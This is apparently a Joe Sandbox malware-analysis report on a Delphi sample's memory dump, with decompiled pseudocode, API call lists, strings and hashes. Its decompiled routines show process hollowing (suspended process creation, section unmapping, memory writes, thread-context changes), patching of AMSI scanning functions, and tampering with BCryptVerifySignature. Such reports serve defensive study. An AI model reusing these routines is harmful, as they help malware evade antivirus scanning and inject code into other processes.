0x032b9567
0x032b9572
0x032b9573
0x032b9584
0x032b958d
0x032b9593
0x032b9598
0x032b959d
0x032b959f
0x032b95af
0x032b95c7
0x032b95d2
0x032b95e0
0x032b95f8
0x032b9603
0x032b9604
0x032b9609
0x032b960e
0x032b9610
0x032b9620
0x032b9638
0x032b9643
0x032b9651
0x032b9669
0x032b9674
0x032b9675
0x032b967a
0x032b967f
0x032b9681
0x032b9691
0x032b96a9
0x032b96b4
0x032b96c2
0x032b96da
0x032b96e5
0x032b96e6
0x032b96eb
0x032b96f0
0x032b96f2
0x032b9702
0x032b971a
0x032b9725
0x032b9733
0x032b974b
0x032b9756
0x032b9757
0x032b975c
0x032b9761
0x032b9763
0x032b9773
0x032b978b
0x032b9796
0x032b97a4
0x032b97bc
0x032b97c7
0x032b97c8
0x032b97cd
0x032b97d5
0x032b97d5
0x032b97db
0x032b97e0
0x032b97e5
0x032b97e7
0x032b97f7
0x032b980f
0x032b981a
0x032b9828
0x032b9840
0x032b984b
0x032b984c
0x032b9851
0x032b9856
0x032b9858
0x032b9868
0x032b9880
0x032b988b
0x032b9899
0x032b98b1
0x032b98bc
0x032b98bd
0x032b98c2
0x032b98c7
0x032b98c9
0x032b98d9
0x032b98f1
0x032b98fc
0x032b990a
0x032b9922
0x032b992d
0x032b992e
0x032b9933
0x032b9938
0x032b993a
0x032b994a
0x032b9962
0x032b996d
0x032b997b
0x032b9993
0x032b999e
0x032b999f
0x032b99a9
0x032b99af
0x032b99b4
0x032b99b9
0x032b99bb
0x032b99cb
0x032b99e3
0x032b99ee
0x032b99fc
0x032b9a14
0x032b9a1f
0x032b9a20
0x032b9a25
0x032b9a2a
0x032b9a2c
0x032b9a3c
0x032b9a54
0x032b9a5f
0x032b9a6d
0x032b9a85
0x032b9a90
0x032b9a91
0x032b9a98
0x032b9a9e
0x032b9aa3
0x032b9aa8
0x032b9aaa
0x032b9aba
0x032b9ad2
0x032b9add
0x032b9aeb
0x032b9b03
0x032b9b0e
0x032b9b0f
0x032b9b14
0x032b9b19
0x032b9b1b
0x032b9b2b
0x032b9b43
0x032b9b4e
0x032b9b5c
0x032b9b74
0x032b9b7f
0x032b9b80
0x032b9b8f
0x032b9b94
0x032b9b99
0x032b9b9b
0x032b9bab
0x032b9bc3
0x032b9bce
0x032b9bdc
0x032b9bf4
0x032b9bff
0x032b9c00
0x032b9c05
0x032b9c0a
0x032b9c0c
0x032b9c1c
0x032b9c34
0x032b9c3f
0x032b9c4d
0x032b9c65
0x032b9c70
0x032b9c71
0x032b9c7c
0x032b9c81
0x032b9c83
0x032b9c93
0x032b9cab
0x032b9cb6
0x032b9cc4
0x032b9cdc
0x032b9ce7
0x032b9ce8
0x032b9ced
0x032b9cf2
0x032b9cf4
0x032b9d04
0x032b9d1c
0x032b9d27
0x032b9d35
0x032b9d4d
0x032b9d58
0x032b9d59
0x032b9d68
0x032b9d6d
0x032b9d7c
0x032b9d81
0x032b9d90
0x032b9d95
0x032b9da4
0x032b9da9
0x032b9db8
0x032b9dbd
0x032b9dcc
0x032b9dd1
0x032b9de0
0x032b9de5
0x032b9dea
0x032b9def
0x032b9df1
0x032b9e01
0x032b9e19
0x032b9e24
0x032b9e32
0x032b9e4a
0x032b9e55
0x032b9e56
0x032b9e5b
0x032b9e60
0x032b9e62
0x032b9e72
0x032b9e8a
0x032b9e95
0x032b9ea3
0x032b9ebb
0x032b9ec6
0x032b9ec7
0x032b9ec7
0x032b8c12
0x032b87c9
0x032b8137
0x032b9ece
0x032b9ed1
0x032b9ed4
0x032b9ee4
0x032b9ef4
0x032b9f04
0x032b9f0f
0x032b9f24

APIs

Part of subcall function 032B7C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C3C
Part of subcall function 032B7C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C4A
Part of subcall function 032B7C04: GetProcAddress.KERNEL32(74180000,00000000), ref: 032B7C63
Part of subcall function 032B7C04: FreeLibrary.KERNEL32(74180000,74180000,00000000,00000000,00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C82

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,032DE394,032DE384,OpenSession,032DE35C,032B9F4C,ScanString,032DE35C), ref: 032B837C
GetThreadContext.KERNEL32(00000000,032DE3D8,ScanString,032DE35C,032B9F4C,Initialize,032DE35C,032B9F4C,UacScan,032DE35C,032B9F4C,UacInitialize,032DE35C,032B9F4C,ScanString,032DE35C), ref: 032B87C2
NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,032DE4AC,00000004,032DE4B4,ScanString,032DE35C,032B9F4C,Initialize,032DE35C,032B9F4C,UacScan,032DE35C,032B9F4C,UacInitialize,032DE35C), ref: 032B89AE
NtUnmapViewOfSection.C:\WINDOWS\SYSTEM32\NTDLL(00000000,?,ScanString,032DE35C,032B9F4C,Initialize,032DE35C,032B9F4C,UacScan,032DE35C,032B9F4C,UacInitialize,032DE35C,032B9F4C,00000000,-00000008), ref: 032B8B9A

Part of subcall function 032B79BC: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032B79C9
Part of subcall function 032B79BC: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032B79CF

NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,032DE4B4,ScanString,032DE35C,032B9F4C,ScanString,032DE35C,032B9F4C,Initialize,032DE35C,032B9F4C,UacScan,032DE35C), ref: 032B933E
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,032DE4B0,00000004,032DE4B4,ScanBuffer,032DE35C,032B9F4C,UacInitialize,032DE35C,032B9F4C,OpenSession,032DE35C,032B9F4C,ScanString,032DE35C), ref: 032B9593
SetThreadContext.KERNEL32(00000000,032DE3D8,OpenSession,032DE35C,032B9F4C,ScanBuffer,032DE35C,032B9F4C,UacInitialize,032DE35C,032B9F4C,UacInitialize,032DE35C,032B9F4C,ScanBuffer,032DE35C), ref: 032B99AF
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,ScanBuffer,032DE35C,032B9F4C,OpenSession,032DE35C,032B9F4C,00000000,032DE3D8,OpenSession,032DE35C,032B9F4C,ScanBuffer,032DE35C,032B9F4C), ref: 032B9A9E

Part of subcall function 032B7B14: LoadLibraryW.KERNEL32(bcrypt,032B9F4C,Initialize,032DE35C,032B9F4C,UacScan,032DE35C,032B9F4C,UacInitialize,032DE35C,032B9F4C,00000000,032DE3D8,ScanString,032DE35C,032B9F4C), ref: 032B7B26
Part of subcall function 032B7B14: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 032B7B33
Part of subcall function 032B7B14: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,032B9F4C,Initialize,032DE35C,032B9F4C,UacScan,032DE35C,032B9F4C,UacInitialize), ref: 032B7B4A
Part of subcall function 032B7B14: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,032B9F4C,Initialize,032DE35C,032B9F4C,UacScan,032DE35C,032B9F4C,UacInitialize,032DE35C,032B9F4C,00000000,032DE3D8), ref: 032B7B59

Strings

BCryptQueryProviderRegistration, xrefs: 032B9D72
NtOpenObjectAuditAlarm, xrefs: 032B9DAE
advapi32, xrefs: 032B9DC7
UacScan, xrefs: 032B81C9, 032B866B, 032B8847, 032B8A3F, 032B8C90, 032B8E71
BCryptRegisterProvider, xrefs: 032B9D86
BCryptVerifySignature, xrefs: 032B9D5E
ScanBuffer, xrefs: 032B7FF2, 032B838C, 032B90CF, 032B9169, 032B950E, 032B9763, 032B98C9, 032B9A2C, 032B9C0C, 032B9DF1
NtReadVirtualMemory, xrefs: 032B9D9A
OpenSession, xrefs: 032B7F99, 032B80A4, 032B82DA, 032B846E, 032B905E, 032B924B, 032B942C, 032B9681, 032B993A, 032B99BB, 032B9B1B, 032B9B9B, 032B9C83, 032B9E62
bcrypt, xrefs: 032B9D63, 032B9D77, 032B9D8B
I_QueryTagInformation, xrefs: 032B9DC2
ScanString, xrefs: 032B827B, 032B857F, 032B874D, 032B8929, 032B8B21, 032B8D72, 032B8F53, 032B92BC, 032B93BB, 032B9610, 032B9AAA, 032B9CF4
ntdll, xrefs: 032B9D9F, 032B9DB3, 032B9DDB
Initialize, xrefs: 032B804B, 032B8222, 032B86DC, 032B88B8, 032B8AB0, 032B8D01, 032B8EE2
UacInitialize, xrefs: 032B8170, 032B83FD, 032B850E, 032B85FA, 032B87D6, 032B89CE, 032B8C1F, 032B8E00, 032B8FED, 032B91DA, 032B934A, 032B949D, 032B959F, 032B96F2, 032B97E7, 032B9858
NtSetSecurityObject, xrefs: 032B9DD6

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: LibraryMemoryVirtual$AddressProcThreadWrite$ContextFreeHandleLoadModule$CreateProcessReadResumeSectionUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
API String ID: 108663649-1058128293
Opcode ID: d6de09042a95a5164f91dfabd016229267287e7675d25815e02f90ba7eb9b262
Instruction ID: fd5fd6ba59448c1786595066c6416229263c8f693a72cc265c726d63cc6527bb
Opcode Fuzzy Hash: d6de09042a95a5164f91dfabd016229267287e7675d25815e02f90ba7eb9b262
Instruction Fuzzy Hash: 8E03D739A246599FCB11FB69DC80ADEB3B9AF45710F1081E1E108AF715DBB0DEC58B50

Uniqueness

Uniqueness Score: -1.00%

Function 032A58CC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E032A58CC(CHAR* __eax, int __edx) {
				CHAR* _v8;
				int _v12;
				CHAR* _v16;
				void* _v20;
				struct _WIN32_FIND_DATAA _v338;
				char _v599;
				void* _t102;
				intOrPtr* _t103;
				CHAR* _t106;
				CHAR* _t108;
				char* _t109;
				void* _t110;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_v20 = GetModuleHandleA("kernel32.dll");
				if(_v20 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t108 =  &(_v8[2]);
						goto L10;
					} else {
						if(_v8[1] == 0x5c) {
							_t109 = E032A58AC( &(_v8[2]));
							if( *_t109 != 0) {
								_t17 = _t109 + 1; // 0x1
								_t108 = E032A58AC(_t17);
								if( *_t108 != 0) {
									L10:
									_t102 = _t108 - _v8;
									lstrcpynA( &_v599, _v8, _t102 + 1);
									while( *_t108 != 0) {
										_t106 = E032A58AC( &(_t108[1]));
										if(_t106 - _t108 + _t102 + 1 <= 0x105) {
											lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1);
											_v20 = FindFirstFileA( &_v599,  &_v338);
											if(_v20 != 0xffffffff) {
												FindClose(_v20);
												if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) {
													 *((char*)(_t110 + _t102 - 0x253)) = 0x5c;
													lstrcpynA( &(( &(( &_v599)[_t102]))[1]),  &(_v338.cFileName), 0x105 - _t102 - 1);
													_t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1;
													_t108 = _t106;
													continue;
												}
											}
										}
										goto L17;
									}
									lstrcpynA(_v8,  &_v599, _v12);
								}
							}
						}
					}
				} else {
					_t103 = GetProcAddress(_v20, "GetLongPathNameA");
					if(_t103 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v599);
						_push(_v8);
						if( *_t103() == 0) {
							goto L4;
						} else {
							lstrcpynA(_v8,  &_v599, _v12);
						}
					}
				}
				L17:
				return _v16;
			}

0x032a58d8
0x032a58db
0x032a58e1
0x032a58ee
0x032a58f5
0x032a593a
0x032a5940
0x032a597d
0x00000000
0x032a5942
0x032a5949
0x032a595a
0x032a595f
0x032a5965
0x032a596d
0x032a5972
0x032a5980
0x032a5982
0x032a5994
0x032a5a45
0x032a59a6
0x032a59b4
0x032a59ca
0x032a59e2
0x032a59e9
0x032a59ef
0x032a5a0b
0x032a5a0d
0x032a5a2f
0x032a5a41
0x032a5a43
0x00000000
0x032a5a43
0x032a5a0b
0x032a59e9
0x00000000
0x032a59b4
0x032a5a5d
0x032a5a5d
0x032a5972
0x032a595f
0x032a5949
0x032a58f7
0x032a5905
0x032a5909
0x00000000
0x032a590b
0x032a590b
0x032a5916
0x032a591a
0x032a591f
0x00000000
0x032a5921
0x032a5930
0x032a5930
0x032a591f
0x032a5909
0x032a5a62
0x032a5a6b

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,032A7360,032A0000,032C9790), ref: 032A58E9
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 032A5900
lstrcpynA.KERNEL32(?,?,?), ref: 032A5930
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,032A7360,032A0000,032C9790), ref: 032A5994
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,032A7360,032A0000,032C9790), ref: 032A59CA
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,032A7360,032A0000,032C9790), ref: 032A59DD
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,032A7360,032A0000,032C9790), ref: 032A59EF
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,032A7360,032A0000,032C9790), ref: 032A59FB
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,032A7360,032A0000), ref: 032A5A2F
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,032A7360), ref: 032A5A3B
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 032A5A5D

Strings

\, xrefs: 032A5A0D
GetLongPathNameA, xrefs: 032A58F7
kernel32.dll, xrefs: 032A58E4

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 230297f1f5a554df6e16b5116573fd838416372f616dd57650ee3dde171283d7
Instruction ID: 6809cfbf3a84241a5f26316c70c231ab7bd37b71847d31e64cb6601ddef2eecd
Opcode Fuzzy Hash: 230297f1f5a554df6e16b5116573fd838416372f616dd57650ee3dde171283d7
Instruction Fuzzy Hash: 00418376E10A29EFDB10DAECCC88ADFB7FCAF09350F1845A5A185DB241D670DB848B50

Uniqueness

Uniqueness Score: -1.00%

Function 032BCFB0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 249
processnativesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E032BCFB0(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				char _v8;
				struct _STARTUPINFOW _v76;
				struct _PROCESS_INFORMATION _v92;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				intOrPtr _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				intOrPtr _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v448;
				char _v452;
				char _v456;
				char _v460;
				char _v464;
				char _v468;
				WCHAR* _t138;
				void* _t211;
				intOrPtr _t213;
				void* _t223;
				void* _t226;
				void* _t229;
				void* _t237;
				void* _t240;
				void* _t250;
				void* _t253;
				void* _t256;
				void* _t259;
				intOrPtr _t260;
				void* _t266;
				void* _t270;
				intOrPtr _t272;
				intOrPtr _t273;

				_t272 = _t273;
				_t213 = 0x39;
				do {
					_push(0);
					_push(0);
					_t213 = _t213 - 1;
					_t274 = _t213;
				} while (_t213 != 0);
				_push(_t213);
				_t1 =  &_v8;
				_t214 =  *_t1;
				 *_t1 = _t213;
				_t270 = __edx;
				_t211 = __eax;
				_push(_t272);
				_push(0x32bd3c0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t273;
				E032A4698( &_v352, "AmsiOpenSession");
				_push(_v352);
				E032A4698( &_v356, "Amsi");
				_pop(_t223);
				E032B7C04(_v356,  *_t1, _t223, _t274);
				E032A4698( &_v360, "AmsiUacScan");
				_push(_v360);
				E032A4698( &_v364, "Amsi");
				_pop(_t226);
				E032B7C04(_v364, _t214, _t226, _t274);
				E032A4698( &_v368, "AmsiScanString");
				_push(_v368);
				E032A4698( &_v372, "Amsi");
				_pop(_t229);
				E032B7C04(_v372, _t214, _t229, _t274);
				_push(0x32bd410);
				E032A4704( &_v380, _t211, _t274);
				_push(_v380);
				_push(0x32bd41c);
				E032A4704( &_v384, _t270, _t274);
				_push(_v384);
				E032A4824();
				E032A473C( &_v348, 0xff, _v376);
				E032A3098( &_v76, 0x44);
				_v76.cb = 0x44;
				_v76.dwFlags = 1;
				_v76.wShowWindow =  *_t1;
				E032A4698( &_v388, "AmsiScanString");
				_push(_v388);
				E032A4698( &_v392, "Amsi");
				_pop(_t237);
				E032B7C04(_v392, 0, _t237, _t274);
				E032A4698( &_v396, "AmsiScanBuffer");
				_push(_v396);
				E032A4698( &_v400, "Amsi");
				_pop(_t240);
				E032B7C04(_v400, 0, _t240, _t274);
				E032A4704( &_v412, _t211, _t274);
				E032A7F10(_v412,  &_v408);
				E032A4D38( &_v404, E032A4964(_v408));
				_t138 = E032A4DB4(_v404);
				E032A4704( &_v420,  &_v348, _t274);
				E032A4D38( &_v416, E032A4964(_v420));
				CreateProcessAsUserW( *0x33d2794, 0, E032A4DB4(_v416), 0, 0, 0, 0x30, 0, _t138,  &_v76,  &_v92);
				_push(0x32bd438);
				_push( *0x33d28a8);
				_push("ScanBuffer");
				E032A4824();
				E032A4698( &_v424, E032A4964(_v428));
				_push(_v424);
				_t217 =  *0x33d28a8;
				E032A47B0( &_v436,  *0x33d28a8, 0x32bd438);
				E032A4698( &_v432, E032A4964(_v436));
				_pop(_t250);
				E032B7C04(_v432,  *0x33d28a8, _t250, _t274);
				NtCreateProcess(_v92.hProcess, 0x1f0fff, 0x33d28d8, 0, 1, 0, 0, 0);
				E032A4698( &_v440, "AmsiUacScan");
				_push(_v440);
				E032A4698( &_v444, "Amsi");
				_pop(_t253);
				E032B7C04(_v444, _t217, _t253, _t274);
				E032A4698( &_v448, "AmsiUacInitialize");
				_push(_v448);
				E032A4698( &_v452, "Amsi");
				_pop(_t256);
				E032B7C04(_v452, _t217, _t256, _t274);
				E032A4698( &_v456, "AmsiScanBuffer");
				_push(_v456);
				E032A4698( &_v460, "Amsi");
				_pop(_t259);
				E032B7C04(_v460, _t217, _t259, _t274);
				_t275 = _v5;
				if(_v5 != 0) {
					E032A4698( &_v464, "AmsiOpenSession");
					_push(_v464);
					E032A4698( &_v468, "Amsi");
					_pop(_t266);
					E032B7C04(_v468, _t217, _t266, _t275);
					WaitForSingleObject(_v92.hProcess, 0xffffffff);
					CloseHandle(_v92);
					CloseHandle(_v92.hThread);
				}
				_pop(_t260);
				 *[fs:eax] = _t260;
				_push(0x32bd3c7);
				E032A44C4( &_v468, 0xd);
				E032A4C24( &_v416);
				E032A44C4( &_v412, 2);
				E032A4C24( &_v404);
				return E032A44C4( &_v400, 0xd);
			}

0x032bcfb1
0x032bcfb4
0x032bcfb9
0x032bcfb9
0x032bcfbb
0x032bcfbd
0x032bcfbd
0x032bcfbd
0x032bcfc0
0x032bcfc1
0x032bcfc1
0x032bcfc1
0x032bcfc9
0x032bcfcb
0x032bcfcf
0x032bcfd0
0x032bcfd5
0x032bcfd8
0x032bcfe6
0x032bcff1
0x032bcffd
0x032bd008
0x032bd009
0x032bd019
0x032bd024
0x032bd030
0x032bd03b
0x032bd03c
0x032bd04c
0x032bd057
0x032bd063
0x032bd06e
0x032bd06f
0x032bd074
0x032bd081
0x032bd086
0x032bd08c
0x032bd099
0x032bd09e
0x032bd0af
0x032bd0c5
0x032bd0d4
0x032bd0d9
0x032bd0e0
0x032bd0e7
0x032bd0f6
0x032bd101
0x032bd10d
0x032bd118
0x032bd119
0x032bd129
0x032bd134
0x032bd140
0x032bd14b
0x032bd14c
0x032bd161
0x032bd172
0x032bd18a
0x032bd195
0x032bd1b1
0x032bd1c9
0x032bd1e2
0x032bd1e7
0x032bd1ec
0x032bd1f2
0x032bd202
0x032bd21a
0x032bd225
0x032bd22c
0x032bd237
0x032bd24f
0x032bd25a
0x032bd25b
0x032bd278
0x032bd288
0x032bd293
0x032bd29f
0x032bd2aa
0x032bd2ab
0x032bd2bb
0x032bd2c6
0x032bd2d2
0x032bd2dd
0x032bd2de
0x032bd2ee
0x032bd2f9
0x032bd305
0x032bd310
0x032bd311
0x032bd316
0x032bd31a
0x032bd327
0x032bd332
0x032bd33e
0x032bd349
0x032bd34a
0x032bd355
0x032bd35e
0x032bd367
0x032bd367
0x032bd36e
0x032bd371
0x032bd374
0x032bd384
0x032bd38f
0x032bd39f
0x032bd3aa
0x032bd3bf

APIs

CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?,?,?,?,?,?), ref: 032BD1E2

Part of subcall function 032B7C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C3C
Part of subcall function 032B7C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C4A
Part of subcall function 032B7C04: GetProcAddress.KERNEL32(74180000,00000000), ref: 032B7C63
Part of subcall function 032B7C04: FreeLibrary.KERNEL32(74180000,74180000,00000000,00000000,00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C82

NtCreateProcess.N(?,001F0FFF,033D28D8,00000000,00000001,00000000,00000000,00000000,ScanBuffer,032BD438,?,00000000,00000000,00000000,00000000,00000000), ref: 032BD278
WaitForSingleObject.KERNEL32(?,000000FF,?,001F0FFF,033D28D8,00000000,00000001,00000000,00000000,00000000,ScanBuffer,032BD438,?,00000000,00000000,00000000), ref: 032BD355
CloseHandle.KERNEL32(?,?,000000FF,?,001F0FFF,033D28D8,00000000,00000001,00000000,00000000,00000000,ScanBuffer,032BD438,?,00000000,00000000), ref: 032BD35E
CloseHandle.KERNEL32(?,?,?,000000FF,?,001F0FFF,033D28D8,00000000,00000001,00000000,00000000,00000000,ScanBuffer,032BD438,?,00000000), ref: 032BD367

Strings

AmsiUacInitialize, xrefs: 032BD2B6
ScanBuffer, xrefs: 032BD1F2
AmsiScanBuffer, xrefs: 032BD124, 032BD2E9
AmsiScanString, xrefs: 032BD047, 032BD0F1
AmsiOpenSession, xrefs: 032BCFE1, 032BD322
AmsiUacScan, xrefs: 032BD014, 032BD283
D, xrefs: 032BD0D9
Amsi, xrefs: 032BCFF8, 032BD02B, 032BD05E, 032BD108, 032BD13B, 032BD29A, 032BD2CD, 032BD300, 032BD339

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Handle$CloseCreateLibraryProcess$AddressFreeLoadModuleObjectProcSingleUserWait
String ID: Amsi$AmsiOpenSession$AmsiScanBuffer$AmsiScanString$AmsiUacInitialize$AmsiUacScan$D$ScanBuffer
API String ID: 1036135174-2335947617
Opcode ID: c0eb8b81c7b860b7d363647f07d04077a89cadf01e7e920b12930c693a66e348
Instruction ID: ba81e47d4848a8881ddc7397eb9afcfce5ed683f3fd3bc99e967f9add66e3f7f
Opcode Fuzzy Hash: c0eb8b81c7b860b7d363647f07d04077a89cadf01e7e920b12930c693a66e348
Instruction Fuzzy Hash: 62A1FF396216199BDB11FB69CC80BCEB3B9AF49700F5044E1A508AB345DBF4EEC58F60

Uniqueness

Uniqueness Score: -1.00%

Function 032A5B9C Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E032A5B9C() {
				void* _t32;
				CHAR* _t56;
				CHAR* _t57;
				struct HINSTANCE__* _t64;
				void* _t66;

				lstrcpynA(_t66 - 0x11d,  *(_t66 - 4), 0x105);
				GetLocaleInfoA(GetThreadLocale(), 3, _t66 - 0xd, 5);
				_t64 = 0;
				if( *(_t66 - 0x11d) == 0 ||  *(_t66 - 0xd) == 0 &&  *(_t66 - 0x12) == 0) {
					L14:
					return _t64;
				} else {
					_t56 =  &((_t66 - 0x11d)[lstrlenA(_t66 - 0x11d)]);
					L5:
					if( *_t56 != 0x2e && _t56 != _t66 - 0x11d) {
						_t56 = _t56 - 1;
						goto L5;
					}
					_t32 = _t66 - 0x11d;
					if(_t56 != _t32) {
						_t57 =  &(_t56[1]);
						if( *(_t66 - 0x12) != 0) {
							lstrcpynA(_t57, _t66 - 0x12, 0x105 - _t57 - _t32);
							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
						}
						if(_t64 == 0 &&  *(_t66 - 0xd) != 0) {
							lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
							if(_t64 == 0) {
								 *((char*)(_t66 - 0xb)) = 0;
								lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
								_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
							}
						}
					}
					goto L14;
				}
			}

0x032a5bac
0x032a5bbf
0x032a5bc4
0x032a5bcd
0x032a5cb6
0x032a5cbd
0x032a5be3
0x032a5bf7
0x032a5bfc
0x032a5bff
0x032a5bfb
0x00000000
0x032a5bfb
0x032a5c0b
0x032a5c13
0x032a5c19
0x032a5c1e
0x032a5c31
0x032a5c46
0x032a5c46
0x032a5c4a
0x032a5c69
0x032a5c7e
0x032a5c82
0x032a5c84
0x032a5c9f
0x032a5cb4
0x032a5cb4
0x032a5c82
0x032a5c4a
0x00000000
0x032a5c13

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 032A5BAC
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 032A5BB9
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 032A5BBF
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 032A5BEA
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 032A5C31
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 032A5C41
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 032A5C69
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 032A5C79
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 032A5C9F
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 032A5CAF

Strings

Software\Borland\Delphi\Locales, xrefs: 032A5AFC
